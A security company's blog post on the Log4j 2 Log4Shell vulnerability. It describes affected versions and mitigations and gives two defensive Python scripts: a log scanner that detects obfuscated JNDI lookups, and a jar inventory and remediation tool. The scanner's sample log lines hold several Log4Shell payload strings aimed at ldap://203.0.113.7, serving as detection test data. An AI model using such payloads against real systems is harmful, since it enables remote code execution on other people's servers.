
Apache Log4j 2 Vulnerability

Posted by Aravind Marthineni on Dec 14, 2021 12:32:05 PM

A Critical severity vulnerability with a CVSSv3 base score of 10.0, the maximum possible, affecting multiple versions of Apache Log4j 2 was disclosed via the project's GitHub on December 9, 2021.

 

Description: Apache Log4j 2 versions <= 2.14.1: JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

 

Log4j 2 is a widely used open source Java logging library developed and maintained by the Apache Software Foundation. The vulnerability (CVE-2021-44228, widely known as Log4Shell) allows unauthenticated remote code execution: any attacker-supplied string that ends up in a log call, such as an HTTP header, a username or a form field, can carry the JNDI lookup.
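Because the payload has to reach a logged field, the attack is visible in application and access logs. The following detector is an added example, not code from the original post or from the Log4j project. It partially evaluates Log4j 2's ${...} lookup syntax (the lower, upper and ${var:-default} forms attackers use to hide the literal text "jndi:") and then looks for a JNDI lookup in the unwound string. The sample log lines are constructed for the example; 203.0.113.0/24 is a documentation address range, and the User-Agent field stands in for any attacker-controlled input.

```python
"""Flag Log4j 2 JNDI lookup strings in log lines, including obfuscated
variants, by unwinding the nested ${...} lookups the way Log4j would."""
import re
from dataclasses import dataclass
from typing import List, Optional

# An innermost lookup: ${...} whose body contains no further '{' or '}'.
_INNER = re.compile(r"\$\{([^{}]*)\}")
# What we are looking for once the nesting has been unwound.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
MAX_ROUNDS = 20  # bound the unwinding; real payloads nest a handful of levels


def _resolve_lookup(body: str) -> Optional[str]:
    """Resolve one innermost lookup body for the lookups abused to hide the
    string "jndi:":  ${lower:J} -> "j", ${upper:x} -> "X",
    ${::-j} and ${env:NOPE:-j} -> "j" (unresolvable variable, default used).
    Returns None for lookups deliberately left alone: jndi itself (never
    evaluate it, only report it) and anything not modelled here, e.g.
    ${date:...} or ${sys:...}."""
    name, sep, default = body.partition(":-")   # ${var:-default}
    key, _, arg = name.partition(":")            # ${key:arg}
    key = key.strip().lower()
    if key == "jndi":
        return None
    if key == "lower":
        return arg.lower()
    if key == "upper":
        return arg.upper()
    if sep:
        # Empty or unknown variable with a default: Log4j substitutes the
        # default text, which is how ${::-j}${::-n}${::-d}${::-i} spells jndi.
        return default
    return None


def normalize(text: str) -> str:
    """Repeatedly substitute innermost lookups until nothing changes."""
    for _ in range(MAX_ROUNDS):
        changed = False

        def repl(m):
            nonlocal changed
            value = _resolve_lookup(m.group(1))
            if value is None:
                return m.group(0)        # leave the lookup in place
            changed = True
            return value

        text = _INNER.sub(repl, text)
        if not changed:
            break
    return text


@dataclass
class Finding:
    line_no: int
    raw: str
    normalized: str


def scan(lines: List[str]) -> List[Finding]:
    """One Finding per line containing a JNDI lookup, in the raw text or
    after the obfuscation has been unwound."""
    findings = []
    for no, line in enumerate(lines, start=1):
        norm = normalize(line)
        if _JNDI.search(line) or _JNDI.search(norm):
            findings.append(Finding(no, line, norm))
    return findings


# Constructed sample access-log lines (not real traffic). Line 1 and line 6
# are benign; line 6 carries a harmless lookup that must not be flagged.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:ldap://203.0.113.7/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${env:NOPE:-j}ndi:${lower:LDAP}://203.0.113.7/a}"',
    '10.0.0.2 - - "GET /?q=${date:yyyy} HTTP/1.1" 200 "curl/7.79"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.normalized}")
```

Report the normalized form alongside the raw line: the raw line is the evidence, the normalized form tells the analyst at a glance which host and port the lookup points at. Lookups this code does not model are left untouched rather than dropped, so a payload that nests something unexpected is still reported if "jndi:" appears anywhere after unwinding.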

 

Affected Versions: all versions from 2.0-beta9 to 2.14.1

 

Fixed Version: 2.15.0 (upgrade to this release or any later one)

 

While patching may be difficult, it is still the number one action that fixes this vulnerability. Apache released version 2.15.0-rc1, quickly followed by 2.15.0-rc2 after a bypass of the rc1 fix was discovered. Apache has also suggested mitigations for those who cannot patch immediately.

 

Mitigations:

  1. In releases >= 2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups (for example -Dlog4j2.formatMsgNoLookups=true on the JVM command line) or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. This disables lookups in the message text only; a lookup that is part of the logging configuration itself and draws on attacker-influenced data is not covered, so treat it as a stopgap until you patch.
  2. For releases from 2.7 through 2.14.1, all PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m.
  3. For releases from 2.0-beta9 to 2.7, the only mitigation is to remove the JndiLookup class from the classpath, i.e. delete it from the log4j-core jar: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class. The JVM must be restarted afterwards; a class that is already loaded stays loaded.
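Before applying any of these, you need to know which log4j-core jars are on each host and which versions they are; that inventory is the step most teams found hardest in the first days. The script below is an added example, not from the original post or from the Apache project. It walks a directory tree, identifies log4j-core jars by their Maven pom.properties (falling back to the filename), checks the version against the affected range from 2.0-beta9 to 2.14.1, and can apply mitigation 3 by rewriting the jar without JndiLookup.class, the same effect as the zip -q -d command above. The demo() function builds constructed stand-in jars (correct layout, stub class bytes) in a temporary directory so the example runs offline; it is not a substitute for a real asset inventory, and it deliberately does not remediate jars whose version it cannot determine.

```python
"""Inventory log4j-core jars, classify them against the CVE-2021-44228
affected range, and optionally strip JndiLookup.class from affected jars."""
import os
import re
import tempfile
import zipfile
from typing import Dict, List, Optional, Tuple

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def _version_key(version: str) -> Optional[Tuple[int, int, int, int, int]]:
    """Sortable key so that 2.0-beta9 < 2.0-rc1 < 2.0 < 2.14.1 < 2.15.0."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?$", version)
    if not m:
        return None
    major, minor, patch, pre, pre_n = m.groups()
    pre_rank = {"beta": 0, "rc": 1}.get(pre, 2)   # pre-releases sort first
    return (int(major), int(minor), int(patch or 0), pre_rank, int(pre_n or 0))


AFFECTED_LOW = _version_key("2.0-beta9")
AFFECTED_HIGH = _version_key("2.14.1")


def is_affected(version: str) -> bool:
    key = _version_key(version)
    return key is not None and AFFECTED_LOW <= key <= AFFECTED_HIGH


def jar_version(path: str) -> Optional[str]:
    """Version from the embedded Maven metadata, else from the file name."""
    with zipfile.ZipFile(path) as z:
        if POM_PROPS in z.namelist():
            for line in z.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    return line.split("=", 1)[1].strip()
    m = re.search(r"log4j-core-(.+)\.jar$", os.path.basename(path))
    return m.group(1) if m else None


def has_jndi_lookup(path: str) -> bool:
    with zipfile.ZipFile(path) as z:
        return JNDI_CLASS in z.namelist()


def strip_jndi_lookup(path: str) -> bool:
    """Rewrite the jar without JndiLookup.class (same effect as
    `zip -q -d <jar> .../JndiLookup.class`). Writes a temp file in the same
    directory and swaps it in atomically. Returns True if the entry was removed."""
    fd, tmp = tempfile.mkstemp(prefix="tmp-", suffix=".part", dir=os.path.dirname(path) or ".")
    os.close(fd)
    removed = False
    with zipfile.ZipFile(path) as src, zipfile.ZipFile(tmp, "w") as dst:
        for info in src.infolist():
            if info.filename == JNDI_CLASS:
                removed = True
                continue
            dst.writestr(info, src.read(info.filename))
    if removed:
        os.replace(tmp, path)
    else:
        os.remove(tmp)
    return removed


def scan(root: str, remediate: bool = False) -> List[Dict]:
    """Report every jar under root that carries log4j-core metadata or the
    JndiLookup class (this also catches shaded jars that bundle log4j-core)."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".jar"):
                continue
            path = os.path.join(dirpath, name)
            with zipfile.ZipFile(path) as z:
                names = set(z.namelist())
            if POM_PROPS not in names and JNDI_CLASS not in names:
                continue
            version = jar_version(path)
            affected = version is not None and is_affected(version)
            present = JNDI_CLASS in names
            removed = strip_jndi_lookup(path) if (remediate and affected and present) else False
            results.append({"path": path, "version": version, "affected": affected,
                            "jndi_lookup_present": present, "removed": removed})
    return sorted(results, key=lambda r: r["path"])


def make_sample_jar(directory: str, version: str, with_jndi: bool = True) -> str:
    """Constructed stand-in for log4j-core-<version>.jar: real entry names,
    stub class bytes. Only for exercising the scanner offline."""
    path = os.path.join(directory, f"log4j-core-{version}.jar")
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr(POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n")
        z.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        if with_jndi:
            z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")   # stub, not the real class
    return path


def demo() -> Tuple[List[Dict], List[Dict]]:
    """Build a small constructed deployment, scan with remediation, rescan."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    lib = os.path.join(root, "app", "WEB-INF", "lib")
    os.makedirs(lib)
    for v in ("2.0-beta9", "2.14.1", "2.15.0"):
        make_sample_jar(lib, v)
    with zipfile.ZipFile(os.path.join(lib, "commons-lang3-3.12.0.jar"), "w") as z:
        z.writestr("org/apache/commons/lang3/StringUtils.class", b"\xca\xfe\xba\xbe")  # must be ignored
    return scan(root, remediate=True), scan(root)


if __name__ == "__main__":
    before, after = demo()
    for r in before:
        print(f"{r['version']:10} affected={r['affected']} removed={r['removed']}  {r['path']}")
```

Run it with remediate=False first and review the report; on a real host, remember that the mitigated jar only takes effect after the JVM is restarted, and that a jar inside a WAR or EAR, or log4j-core classes repackaged into a fat jar under another name, will only be caught if that archive is unpacked or the scan is extended to look inside nested archives.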

 

Observian's Managed Detection and Response (MDR), a part of our managed security service, can help you stay informed of vulnerabilities like this and many more security-related events. Observian is closely partnered with Lacework and integrates its Utah-based managed service offering with Lacework's platform to remove the complexity and cost of cloud security and compliance. Learn more about our service here: https://www.observian.com/aws/managed-service.

 


 

Tags: Security, Managed Security